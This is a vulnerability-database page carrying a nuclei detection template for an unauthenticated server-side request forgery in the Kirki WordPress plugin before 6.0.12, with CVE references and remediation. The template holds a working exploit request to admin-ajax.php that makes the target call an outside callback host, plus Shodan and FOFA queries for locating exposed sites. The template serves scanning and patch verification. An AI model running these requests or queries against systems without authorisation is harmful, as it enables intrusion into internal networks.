Lucene search
+L

WordPress Kirki < 6.0.12 - Server-Side Request Forgery

🗓️ 08 Aug 2026 09:09:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Kirki WordPress plugin below 6.0.12 allows unauthenticated server side forgery; update to 6.0.12+.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-13147
20 Jul 202606:00
attackerkb
circl
Circl
CVE-2026-13147
20 Jul 202608:45
circl
cve
CVE
CVE-2026-13147
20 Jul 202606:00
cve
cvelist
Cvelist
CVE-2026-13147 Kirki < 6.0.12 - Unauthenticated Server-Side Request Forgery via kirki_get_apis
20 Jul 202606:00
cvelist
euvd
EUVD
EUVD-2026-45889
20 Jul 202606:00
euvd
nvd
NVD
CVE-2026-13147
20 Jul 202607:16
nvd
ptsecurity
Positive Technologies
PT-2026-61532
20 Jul 202600:00
ptsecurity
vulnrichment
Vulnrichment
CVE-2026-13147 Kirki < 6.0.12 - Unauthenticated Server-Side Request Forgery via kirki_get_apis
20 Jul 202606:00
vulnrichment
id: CVE-2026-13147

info:
  name: WordPress Kirki < 6.0.12 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: high
  description: |
    Kirki WordPress plugin < 6.0.12 contains a server-side request forgery caused by lack of URL validation, letting unauthenticated attackers make the site issue HTTP requests to arbitrary hosts, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can make the server send HTTP requests to arbitrary hosts, potentially leading to internal network access or data exposure.
  remediation: |
    Update to version 6.0.12 or later.
  reference:
    - https://wpscan.com/vulnerability/kirki-ssrf
    - https://nvd.nist.gov/vuln/detail/CVE-2026-13147
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-13147
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: developer-developer
    product: kirki
    framework: wordpress
    publicwww-query: "/wp-content/plugins/kirki/"
    shodan-query: http.html:"/wp-content/plugins/kirki/"
    fofa-query: body="/wp-content/plugins/kirki/"
  tags: cve,cve2026,wordpress,wp-plugin,wp,kirki,ssrf,oast

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "window.wp_kirki")'
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        internal: true
        regex:
          - 'nonce:\s*"([a-f0-9]{10})"'

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=kirki_get_apis&endpoint=get-pre-built-html&elementUrl=http%3A%2F%2F{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{nonce}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4b0a00483046022100850106bfc326c938c3ab6b71e56941084e1ef1782fc6e7f8c165410734ad33bc022100b3a3976c8c970e6ad34837616e9ec3f4e0e01e773e37cc9b9d2bb501f1713751:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Jul 2026 01:52Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.19.1
EPSS0.00253
SSVC
4